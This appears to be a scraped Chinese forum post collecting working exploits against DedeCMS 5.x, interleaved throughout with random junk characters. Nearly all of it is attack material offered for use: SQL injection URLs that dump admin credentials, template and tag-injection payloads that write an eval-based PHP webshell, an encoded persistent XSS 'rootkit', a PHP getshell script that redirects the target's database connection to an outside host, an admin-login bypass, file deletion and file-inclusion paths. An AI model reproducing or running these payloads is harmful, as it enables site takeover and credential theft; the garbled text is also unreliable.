|
|
+ j+ {4 f% `6 `& O5 i; `) z
Dedecms 5.6 rss注入漏洞
# s: m! G, \. @; _8 l" F% [& `* zhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
) _3 y4 [' ? u( E3 \- a5 l
. [0 w$ `. R/ Y* v" W9 t+ ^: x9 x/ X: Y
2 D+ B) b) k1 e0 R) v, W4 q* r% G8 `: \7 ?7 p3 f1 M. p/ n: T
6 K: f! K* `- D6 m) x* e4 u
/ h2 }1 d9 W& f& ^- y# v/ N k
+ E& [. ]* H6 j+ f5 p& S' C `; K/ i7 U# }* N. I1 F) q
DedeCms v5.6 嵌入恶意代码执行漏洞2 \4 X5 ^; Z: y0 a" [ c
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
& _3 J# N, [) @% j3 w' Y发表后查看或修改即可执行6 U: p# b* C$ }4 o$ h
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}: Y- L2 @" g( \' ?1 b
生成x.php 密码xiao,直接生成一句话。' ?3 @- I( e% U- C3 y# E
/ ]$ R6 o' F/ s5 G
6 [. A& Q9 Q/ c- s4 @/ X- ^# r" o
+ s: H) z9 g2 \; E. k& w
4 Q4 J2 `1 V. ~4 M% `/ ]; P3 ]7 n H0 E$ G* w' ]( w& K+ T7 \0 n
" A3 f* _5 i3 ]8 P# f, T
' N5 R9 ^5 b9 M; Z6 ~; y7 dDede 5.6 GBK SQL注入漏洞: t7 p- }+ F* e0 d' @
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
) A8 x- X) k" ^7 H9 Q' X0 fhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
) }: g% C. L: I* o/ o( t. ohttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7+ ?9 |' |7 i9 M3 p, [- U' c
& m+ x B5 J, l/ I. h6 O8 T) \! x* ?0 v k4 z' L
- C# b( d7 F9 f; C6 ^. \
# i3 |) A, H T/ ^/ P: S) N7 U7 r: Q8 U( ~. U
! \6 B( Y. Z0 V$ V& [, {; \! Y- O" U( B
: V7 p! N! F+ y& L) w6 ~! w3 g; B9 O( S
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
$ d# B( L3 n' J; x3 w6 uhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ) Y4 F9 ~# A8 r, \0 y) `1 J' L
6 E% ^; e6 R% U$ J I3 T5 m) C. |3 W
( Z v& q, K( N5 H( t( c& o6 s J
v0 a; ?# Y/ o$ A$ t, ?- n
: i. a& Z l. n( x, j3 Y& p: ]
2 ]& d' v* H) z
- C. F Z- t& Y5 BDEDECMS 全版本 gotopage变量XSS漏洞
5 p U: U8 s3 ]! U6 q$ k* v, l8 S1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 6 y9 O9 t0 Z U- a( G
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="/ x" g$ |2 i& b- e* r& u+ s, _
# ^ `) ?3 f/ U: B& h$ V
% z3 \" s! | a. o4 L3 K) T2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
4 \! W9 C) l) U6 |9 j3 n8 X- `http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
% i' s- W2 I- I
7 E4 c( ?- w+ I
" n+ z2 P- t8 ?" c; Vhttp://v57.demo.dedecms.com/dede/login.php
+ B# o, h2 K9 {& ~/ Y$ ^' Y5 ]; \
; o. h" @/ S+ }$ H- j
+ j2 j4 m5 y' {color=Red]DeDeCMS(织梦)变量覆盖getshell
$ p% f7 d2 p; P# p' C#!usr/bin/php -w% i" R' Y) J6 u; k0 v
<?php2 y* f- m$ @0 p7 D
error_reporting(E_ERROR);
5 l! U1 C8 {/ m2 ]/ H4 y% pset_time_limit(0);% t$ f ^ a5 {! _9 T
print_r('
5 S4 S" s6 }9 P! G1 i- Q3 h* aDEDEcms Variable Coverage, ~ G7 a' k1 s
Exploit Author: www.heixiaozi.comwww.webvul.com/ K$ k: l4 b; j6 T2 `
);4 ?8 q) a. r, c) d# n
echo "\r\n";, B: k' Q5 E- K% }( T3 j0 |$ `
if($argv[2]==null){) l/ J5 D' w: l6 ~4 j& s
print_r(', D/ N/ m2 }' y! {4 O' g
+---------------------------------------------------------------------------+' |5 r% {& V. |5 n1 F9 @# c: p
Usage: php '.$argv[0].' url aid path7 V, ?. A- T3 L1 D1 U+ x4 ~
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/+ J9 R* G; G# N3 U F; i, A, ?
Example:
# e+ `7 u2 ^! @php '.$argv[0].' www.site.com 1 old3 y" l7 f! ?; k) X
+---------------------------------------------------------------------------+
/ k* ?0 @6 e! o$ A! K' }* D, P3 U');
8 _$ v& D+ }( c4 x& t, bexit;
- p0 c- e5 D7 Y}
% }! {7 ^* T8 c7 Y$url=$argv[1];
) Z' R7 h8 Q4 _0 {: [$aid=$argv[2];' \7 U, p3 r, `3 e
$path=$argv[3];/ }) A3 ^1 j" N0 E2 |/ u+ x2 [8 C
$exp=Getshell($url,$aid,$path);, d* n2 Z3 r( G- X$ _
if (strpos($exp,"OK")>12){
. R. @ @2 g+ I2 t5 i) Iecho "
: ?9 _* q: N# B( a$ @# k {, uExploit Success \n";. |) @- Y2 C# V0 d: g/ L
if($aid==1)echo "
W' A2 V0 [8 H) V4 D8 p8 lShell:".$url."/$path/data/cache/fuck.php\n" ;- z1 d1 d; `* c+ i8 j; B, v
1 Y5 q) j% o/ Z7 b! U
2 c/ H) q# ?) p9 ?% `5 r( v4 m
if($aid==2)echo "% e2 `8 ?1 k h8 j+ |: { E: f# C
Shell:".$url."/$path/fuck.php\n" ;
0 b. w) Y/ J' B) _
, r3 o# u' H$ U2 o
$ m% j" e1 u: A$ Z: g) Jif($aid==3)echo "$ k: I t4 w- |/ k
Shell:".$url."/$path/plus/fuck.php\n";
- k* `, i5 q. u' s, G& ` j5 T2 S0 }' L1 x3 E8 y# w
( E: L, k0 q6 U! `% `
}else{
0 }& v* G: \+ b, [* ?( \echo "+ k, c) o; S7 |; q$ [. r9 I: v1 x8 R
Exploit Failed \n";
" G. {% w0 U! P, N* S}. g K# }) h5 W) M
function Getshell($url,$aid,$path){
/ [3 J1 Q6 q( G, \* b$id=$aid;
; I# t( N5 j/ W% j$host=$url;
2 z% m: {2 c. q1 t6 ]5 {$port="80";( ?( a x# _- x" K+ _! G4 e$ e
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
+ }+ O' f1 E6 H G6 S$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
7 j* m3 D: o9 X$data .= "Host: ".$host."\r\n";6 f; g* J, e. [: ?7 e+ S" ]8 a: A* G: Q/ d
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";/ K2 h. @% M+ _& E9 k0 S5 Q
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
' ~) i" L" a. l% C: N/ f$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
9 G0 p8 ?5 L2 c/ c3 y//$data .= "Accept-Encoding: gzip,deflate\r\n";
' L% {! O2 ?- m& @$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";" N( {) z7 C. t4 V2 G% R( `0 R
$data .= "Connection: keep-alive\r\n";' T. w) O2 }2 a9 f
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
( g8 |& W! r" z% B" N/ [$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
2 p5 @1 v, G) O5 F6 U" m% A5 Y$data .= $content."\r\n";
2 E, n! H+ G) t0 J$ock=fsockopen($host,$port);: j, Z: n8 C' p: j3 \
if (!$ock) {' K6 K# M! c1 x, @! x$ ~8 C
echo "
2 q6 B7 B! y0 q0 V' @9 Q% L D) lNo response from ".$host."\n";
& L! p$ ~4 H0 _8 M d}
6 t! ]! B3 M# {, g% G* A1 Hfwrite($ock,$data);
, S$ I* k9 r7 C1 j5 g. r6 H, N& Q7 hwhile (!feof($ock)) { w% p% m) ~2 n) S1 E/ a
$exp=fgets($ock, 1024);
' ~5 j0 R3 \3 t3 O* X$ }$ q3 Freturn $exp;
: [7 \5 o* A2 l}
- Q- m+ X$ f3 E}
5 V) C! g+ ?. a8 R( r8 w1 W3 ^* S% ~9 U% g1 [2 t
+ ?; ~+ P4 I4 N. {( f- j
?>
8 p4 L# R9 T) \% X: C% B1 g
; A7 h, u: f6 t0 k( p% j
% B! q+ ]; C- f+ a) C- l5 }5 l
2 i2 D8 F5 {9 e+ }7 ~# n( P- d$ n
: N# i* k p! g; h
2 F; p' P; _9 m1 t' s' J7 O1 ?0 O. V$ q1 `* Q+ t0 F# t
( C% F8 W. ^6 U6 l' j+ i! g0 G, b. r2 s
0 p% r% e$ S; C/ ]. Q) l& ~- _$ B
. j& i! u! ~- M! ^0 LDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)) s3 ]. a) n* W
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
: C, V; B& F, P' G8 S9 Q& P z" i* o( }# g/ L/ m. ]* |" a- @
; a( [0 w% D! P4 K' k把上面validate=dcug改为当前的验证码,即可直接进入网站后台$ \3 p% |: _3 o4 o+ s' W
' b: B! V3 k2 s0 j1 J
# e* A5 s- `6 ]! v( ]& a
此漏洞的前提是必须得到后台路径才能实现
- _; f" X5 V8 w) V% p. x9 |& f2 W' [0 B% c6 u9 G" k' ^
4 F- f; }8 B1 Z, J) z; [" g
* x) x! h: \3 c V7 o3 O9 I
) |2 B- q0 M4 r& {+ T% b7 l+ { D$ v9 I, Q; ~
. B9 D, s2 s/ S2 k5 T
! K& v# i* _5 \ ]0 k
9 T, H3 ` V2 w% v7 C% T1 M4 b3 J
# n* i1 v3 J- f6 kDedecms织梦 标签远程文件写入漏洞
. G/ d: [- e; h* C+ H8 M- _前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');, s o9 v3 |6 z$ P0 P7 ^* V
2 S5 U- ?* J8 U% X
' V. {: g; R4 M l' a( h0 R再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
( e6 z( t( H8 Q F<form action="" method="post" name="QuickSearch" id="QuickSearch">9 R! @7 R- s- O3 `* p' v n, M
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />4 ~: `/ D- B# y3 F5 F/ W
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
) k7 v8 x& U1 H% v8 Q! A<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />! g7 r$ B& o1 o, ^+ M& C. I
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />0 w7 l4 i" H% z: w8 O" O
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
5 V. U* P7 r3 V% t! D2 Y W/ d0 ]! U<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />3 i. z {+ |3 x4 ~
<input type="text" value="true" name="nocache" style="width:400">
7 v- `' w4 g0 Y8 D<input type="submit" value="提交" name="QuickSearchBtn"><br />3 X: `! n7 K* [2 r$ K* z
</form>
4 q& @' e7 k/ V* s0 g<script>' U7 E) m o- h0 \
function addaction()
% _1 B; |8 I% x4 z5 o: V& n3 M4 y) G{* `1 u. H: k8 W, U. N
document.QuickSearch.action=document.QuickSearch.doaction.value;
$ B( ?3 e: ?) }% _}. {9 a; H7 L9 e; ]4 t! S% r
</script>1 s+ `" H3 j$ Q( k
' ^; k/ W+ B0 B' h" R6 a
' }6 Z$ B5 [2 L q; M, l9 t1 B
, m/ s/ j5 t( R" E0 o
! N( g& H" K% d! n9 `
5 m/ o1 d1 \2 k. t) F9 e; ?" V- l; C" d. D
: E0 t' K2 q" ` w# R! w- D% P4 w4 r$ p' ~
; a1 b" t s5 l, c7 A( U
W6 u. c1 \7 x( IDedeCms v5.6 嵌入恶意代码执行漏洞: ^7 w' o9 ]- j" m8 X3 q
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
: n: b6 B$ p2 x) K' f8 |( z1 }a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
) S, B2 x& _6 R; h生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得3 B$ k: f3 A% U5 C$ }; T- g
Dedecms <= V5.6 Final模板执行漏洞
! D5 D. e" s! a# D, j3 E, n注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:- |% ]! H$ I$ M* ~, b" W
uploads/userup/2/12OMX04-15A.jpg8 \& B: D* G/ V+ g* G' i) B E
, t# _ M# N; _3 T6 G+ U
- P" x; A5 y3 r- y& m
模板内容是(如果限制图片格式,加gif89a):. U3 f% i( q" D2 `. ]/ V# L- r5 Y
{dede:name runphp='yes'}+ m. Z. d, }- J0 Z# Z1 `
$fp = @fopen("1.php", 'a');
5 `8 A+ z6 {6 b9 b7 a9 H% ?$ C@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");5 ^+ ?% N3 s7 W: t+ u/ }
@fclose($fp);: ]7 _3 b2 Y& T' i* U% F
{/dede:name}
! _! }! i! O; }, [( @( t4 T; A1 r$ E2 修改刚刚发表的文章,查看源文件,构造一个表单:& V" p: e' R7 g/ r$ q# d1 {1 w
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">* Z: w8 E" Q- \" \2 A
<input type="hidden" name="dopost" value="save" />
% F2 @) c1 ?. s4 t0 S: [# L( `0 y5 K<input type="hidden" name="aid" value="2" /> H, m4 ?$ A. G$ e$ v# ?* R( D
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
4 J1 N5 b- v3 w7 @<input type="hidden" name="channelid" value="1" />
+ _/ `+ P' U( I. @) `0 B* `2 n! v/ B<input type="hidden" name="oldlitpic" value="" />+ k- M" t; T9 \ s/ h8 p" V
<input type="hidden" name="sortrank" value="1275972263" />% b; o. W6 a0 R# k/ I3 s( T6 C4 e
+ t) Y! x9 o' u1 k
& [8 ?/ w4 x3 i* b
<div id="mainCp">
: g3 H: u* Z8 c6 N<h3 class="meTitle"><strong>修改文章</strong></h3>
0 \( k2 F* o+ s8 T& O* a; T# J/ m% y" f" a- B. h
) m/ V; P7 S* f0 C. Q3 i
<div class="postForm">
) s+ z# M4 j9 D$ C$ H/ ]/ v$ V<label>标题:</label>
+ o) x0 t2 F' X& n<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>" m! T: _+ c* H! ?1 P; O1 ^ Q8 ]2 s
; }) v* V" g: `/ S: U1 N/ z M+ j- Y9 N" B1 p
<label>标签TAG:</label>7 m4 \9 y$ r) y* h
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)6 _8 y3 V/ U4 r- ^, I$ w$ Y2 Q% f' C
( M$ }7 f- E5 D# k, t5 {3 S( E9 \
% [$ n2 \) W+ b8 `<label>作者:</label>
4 ]7 u7 r+ _1 v2 R! Q: P2 a<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
$ R+ u4 Z; K9 [5 F4 m6 u+ h1 ?: Q/ L5 v: z
1 F& y) [% j! P, F
<label>隶属栏目:</label>
% Q/ K: |+ e* H9 P<select name='typeid' size='1'>$ G9 u1 w8 O4 K3 Q
<option value='1' class='option3' selected=''>测试栏目</option>7 t2 H8 r4 l, Y: O$ ]2 P/ w+ h" i
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
, H/ ?6 b9 W J9 M% V6 @5 Q% R; g/ k
8 q! Q7 N9 o% D<label>我的分类:</label>4 Z4 [: X- N5 h
<select name='mtypesid' size='1'>0 f2 V- [8 x% D& U; e/ y
<option value='0' selected>请选择分类...</option>2 ^4 F4 x1 Q- s6 s
<option value='1' class='option3' selected>hahahha</option>
7 J, s( c* O$ a0 } R R: _2 A</select>+ H) g, ]6 P5 [$ c
1 c+ R# S0 ~" }+ P
# [/ X9 z D$ A8 [& i& P<label>信息摘要:</label>
! _4 E7 K5 U. r# X, z<textarea name="description" id="description">1111111</textarea>
R* J! g: K6 V& n" V" {' V8 c(内容的简要说明)
7 O5 m0 a# N8 y* t$ s6 D
g7 H! u4 o& R' J! X; V: l8 G- D) i2 e8 A' {
<label>缩略图:</label>
! \$ g9 x# L0 ~& _' ^5 M<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>2 Y- ^9 Q; ~2 j+ k
3 H5 V; F0 @6 `+ S. J. |+ Q
* ~9 B& b, m' q8 j<input type='text' name='templet'
& X4 s; E7 A' uvalue="../ uploads/userup/2/12OMX04-15A.jpg">
/ Y, H* _* w0 V- g; F0 ?9 B! p E<input type='text' name='dede_addonfields'
! e+ u1 i9 f$ H) } fvalue="templet,htmltext;">(这里构造)/ h5 `* V2 ?9 Y, H, I
</div>! i( X6 i( t- J$ a4 ^
0 i1 Z) g6 M# I9 o
) |" l" I7 Y! h: F8 a0 d
<!-- 表单操作区域 -->
+ k, u W6 B* p( s- E. s9 T2 A<h3 class="meTitle">详细内容</h3>% p' k2 N2 e$ a9 T- n
+ h; f. h1 {4 r8 p' A
% o: J0 c: ]6 j n( \5 h<div class="contentShow postForm">
+ f8 W3 A/ A4 s, K<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
$ ~8 j5 l- g' o/ t4 g4 _* n6 A7 n' c2 z! t
6 p: H; B P5 K5 t<label>验证码:</label>- y7 z Z5 N; W$ O+ r& W
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
( Q/ m! I. Y! N) `8 O<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />* R5 u' _2 s1 E* S- \
( ~ o9 s: s( z& j% r5 F
" t- m& m) m$ F) t! O. [$ C<button class="button2" type="submit">提交</button>
/ o9 f" L5 P9 A<button class="button2 ml10" type="reset">重置</button>
; V) i G* X* W' {- M</div>
. P* H* U) u! Z- a, E \
6 I/ o, N0 n+ g- l7 [) y- u3 T9 r1 S. Y7 E. S
</div>7 n1 l: F: u& B G
/ s+ Z6 w( @, e. Z
& ~. S: z& {4 X0 @$ H3 V1 F</form>4 E2 a0 m& h4 ^ z2 Z
) _0 [# V! r& D l. g
/ p' K, T0 h8 R提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:+ v) `7 @' M0 ]) a" ~
假设刚刚修改的文章的aid为2,则我们只需要访问:# P R/ d3 X4 L4 ~0 b
http://127.0.0.1/dede/plus/view.php?aid=23 a" h) ~* o; k; o R! A& X
即可以在plus目录下生成webshell:1.php
0 A& }# b& ~0 r8 V5 K Q+ r' _. H5 x
1 q8 }- ` @) e* L- k R7 v6 \- d
& h7 ?% P1 w& w6 d; z( ?8 U7 |( T7 Q" a$ Y8 Y* b# R% Z
- f3 Q/ \& k' s( f
. `! {$ V! {6 C; O- k3 Y
G" r- ]& F4 T2 F5 [0 H0 r3 D, Y( }
3 h% B4 j" J" w6 ]. [1 M+ f- Z- e: Y% R
D6 S9 X D% x" h# B
1 s# X1 F1 v1 Y$ t) ~0 h& x
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
0 Y2 n' c5 e. KGif89a{dede:field name='toby57' runphp='yes'}
: b4 }9 m/ \1 M7 Ophpinfo();8 G6 z9 @* O0 h; Z, q
{/dede:field}
z3 R+ }+ y5 O _保存为1.gif' o/ S# _& @! U, a. \
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
9 }& I2 A9 X- F9 ~, `<input type="hidden" name="aid" value="7" /> 8 K8 H7 T# r6 e2 R/ d/ g
<input type="hidden" name="mediatype" value="1" />
9 Q) G* b; H( J- g<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> ; l% D6 }* f. R
<input type="hidden" name="dopost" value="save" /> 6 b! H. S5 l) W: z8 ?% d
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
! p4 f2 e/ `; P- |" y/ C; p& I<input name="addonfile" type="file" id="addonfile"/>
1 y1 r$ F, D& G2 y* N/ G<button class="button2" type="submit" >更改</button>
* c8 m# C- p9 U3 U. I8 @</form>
+ M1 g+ V$ Q9 M9 O& Z l0 C# G
6 o7 f/ Z4 } Z5 ^
) A! J5 `0 r: y: x构造如上表单,上传后图片保存为/uploads/userup/3/1.gif: u# h1 } @0 x1 @6 ~ j% b6 X; J
发表文章,然后构造修改表单如下:6 f7 E: M& X2 D
: C$ j1 K' M& q5 T! \( |# Q
* b2 K5 x7 T$ g7 j" k" W
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
' N6 \# V4 n! a9 }; v( ^<input type="hidden" name="dopost" value="save" />
' J+ T+ g+ w7 E; c+ L<input type="hidden" name="aid" value="2" />
% G- @' Y6 u0 ~% U. F1 l9 ~1 g<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
) F" G4 ~1 E" c. z+ [2 a s* ~<input type="hidden" name="channelid" value="1" />
. @. C- j# W: f<input type="hidden" name="oldlitpic" value="" />
: d6 n# p% v- z$ x<input type="hidden" name="sortrank" value="1282049150" />
) g4 {& a d. \3 j7 X" m$ C6 p<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 8 T! ~2 ^- |7 ?5 }
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> " Z' l$ O$ C1 ]/ q! Z; `
<select name='typeid' size='1'> & c" ^& ]2 E: c: ?# R( I
<option value='1' class='option3' selected=''>Test</option> ' Z! l# e; \8 K; |2 F
<select name='mtypesid' size='1'> 7 n O2 [3 w) Q" m
<option value='0' selected>请选择分类...</option> ! q/ b" r; Y1 I, y& ~
<option value='1' class='option3' selected>aa</option></select> " x" w# o6 s: @ l6 Y
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> : j2 L/ ?$ M- A; P, H. v2 s* f
<input type='hidden' name='dede_addonfields' value="templet">
% b8 |$ H: H% M* X. L<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> * A3 I! P- R. N5 H
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> ( d4 S' a! M& M2 v( ~$ `
<button class="button2" type="submit">提交</button> 7 K. Q" m5 x5 _& K O
</form>' d" R( p* @' X% ]
( a2 B8 c( I, u3 n7 a7 a4 X. s3 m2 A- X0 f3 F( x4 ~, z* _
8 a1 A7 X5 d/ Y% h& { ?+ s% j: j6 A4 k: G% z
: s" _$ @9 ^, Y1 f9 f+ G p l
1 F* X2 {- I0 x# m) s y7 t+ E" a$ f* p+ P" q# P9 D
1 |8 S3 g1 V3 X4 V+ v# E4 p1 Y: A6 I) H4 l! m; Q! a7 U
, F( q, J! W8 x1 ~6 ?- y3 v+ w' x+ _9 [) X
2 |" |& {2 }$ E7 a6 J: q织梦(Dedecms)V5.6 远程文件删除漏洞6 y8 ~, c8 }$ b/ S# g1 E) s
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
& n% l3 r7 M$ J. B3 s# O6 S% a, g) X. `5 \6 U5 i( B
* Y2 Z' d7 T: o; w; M6 p) Z5 u8 H1 K8 Z( ?: F
+ ~; ~" {% L, L0 v( L( Y+ G+ G
& u( i5 Z- K: e8 j( q2 F
2 q6 D4 R; B* q: `
. i. a- d) r7 M& ]; }# i
6 `, g8 |9 a6 D. Y& D+ ?
?/ }, w6 O* _7 `" \: ?( j
) a+ i' m: m0 W ^% t* Y织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
/ B5 }4 z& \% n q, I3 ihttp://www.test.com/plus/carbuya ... urn&code=../../
) |4 Y% e* A& l; N' s
7 F8 ?6 {& |3 | j. a- H; P0 c9 M' @' K8 M, \
5 k7 e u0 \6 j/ J1 u9 q @8 z* W
0 @6 V* }% ?, n! p2 K2 w; q$ n& u; Q5 l' {" X8 W
- v1 @& z6 n9 I4 b2 W1 Y e+ q) Z0 i$ i m2 M
+ s. ^8 b* z$ E. [3 N8 K
" n) l. F; e* T5 ]+ e
* k8 ?0 m& X% T8 t' W4 ZDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
) f0 ~: x1 p' z Aplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`6 P6 a* q* o0 A8 r5 N7 ?( x
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
' _7 W3 O/ F3 c% y2 {; p& S
+ X' @4 a0 S, W" T1 O2 Z) z6 k) L1 w
" l+ c% V) X: ?* j
& A" k7 [4 b O T9 A" A% r' [! \6 a# L. C
& @% {7 m+ {4 J4 a( l1 y/ d
2 H3 N3 N; e7 h* C3 U
- b% p0 Q/ T, q7 T6 [0 P. o
- o4 W, h. { j* T K% \% A# e, v# q; S2 V! U. w y# \
4 N- n7 [6 p! A/ l5 k/ m. ?* j
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞: ]" M6 a2 R$ a
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=' Z8 z- E* _+ E& P3 P- C: K: j3 n8 [
$ N& }* k* }5 @$ x( C3 I
; J' i" f- d$ T- F& U% z
7 Y% y+ d% D& H
5 g4 U. k) A! v1 {/ q1 A2 r7 |" e
4 }, Z3 Q ^$ v1 p/ {: c
, E& K+ e4 e2 U6 y+ h# ~4 G
* R$ P1 y! d$ `" D$ k W. V5 Z) s# w- o* L- j4 U
+ ? |% z. t. H* b; m
